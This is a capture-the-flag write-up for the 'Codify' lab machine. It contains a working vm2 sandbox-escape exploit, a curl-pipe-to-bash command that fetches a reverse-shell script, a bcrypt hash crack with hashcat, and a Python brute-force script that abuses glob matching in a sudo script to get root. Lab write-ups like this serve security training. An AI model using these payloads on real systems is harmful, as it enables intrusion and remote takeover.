Codify
IP: 10.10.11.239 Starting with the nmap scan
nmap -sC -sV -o nmap 10.10.11.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 05:33 EDT
Nmap scan report for 10.10.11.239
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://codify.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Codify
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.10 seconds
So as we can see we have only 3 ports open 22, 80, 3000
on port 3000
we have a Node.js framework running. So let's add that to our host file and let's explore the webpage
sudo nano /etc/hosts
Now let's visit the webpage.
we have an about us page let's explore that first
As we can see here It says it is using the vm2 library
to run Javascript code in a sandbox environment. Doing some Google research we found a CVE
So here we have found CVE-2023-32314
Moving to the Editor page and then trying to exploit the above code
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("cat /etc/passwd").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
So we modified the exploit to see if we can have a look in the passwd file
And yes, we can see the content of the /etc/passwd
file now let's create a bash script and try to get a reverse shell.
sudo nano shell.sh
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.64/1337 0>&1'
Now let's set up a python server and get a shell
python3 -m http.server 9000
Now modify the script with our payload
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("curl http://10.10.14.64:9000/shell.sh|bash").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
We got a hit on our server
Now let's check our netcat listener
rlwrap nc -nlvp 1337
So we are logged in as svc
user
we have a user named Joshua let's try to find something to switch users. While enumerating on the website portal we found an interesting thing
In the /var/www/contact
directory we can find tickets.db
file. Take a look at the content.
we can see that there's a hash for the joshua
user. Let's try to crack that.
We check the hashid of the hash captured
hashid hash.txt
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
so we got the password spongebob1
Now as we saw on our nmap scan we have port 22 ssh
open so let's use that to gain the shell
ssh joshua@10.10.11.239
Now let's get our user.txt
Flag: b592024dc71df7e461888c5d50a8fb4b Now let's escalate our privileges to get the root flag. By running sudo -l
we can see that we have root privileges to execute the mysql-backup.sh
script.
The vulnerability in the script is related to how the password confirmation is handled
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
This section of the script compares the user-provided password (USER_PASS)
with the actual database password (DB_PASS)
. The vulnerability here is due to the use of == inside in Bash, which performs pattern matching rather than direct string comparison. This means that the user input (USER_PASS)
is treated as a pattern, and if it includes glob characters like * or ? it can potentially match unintended strings. For example, if the actual password (DB_PASS)
is password123 and the user enters * as their password (USER_PASS)
, the pattern match will succeed because * matches any string, resulting in unauthorized access. This means we can brute force every char in the DB_PASS
. Now let's use a custom python script that exploits this by testing password prefixes and suffixes to slowly reveal the full password. It builds up the password character by character, confirming each guess by invoking the script via sudo and checking for a successful run.
import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False
while not found:
for character in all:
command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
password += character
print(password)
break
else:
found = True
Now let's run this script to get the password.
python3 exploit.py
So we got the password kljh12k3jhaskjh12kjh3
. Now let's change our user to root.
su root
Time for our final flag root.txt
Flag: 27668e638861d973df7570af9f520528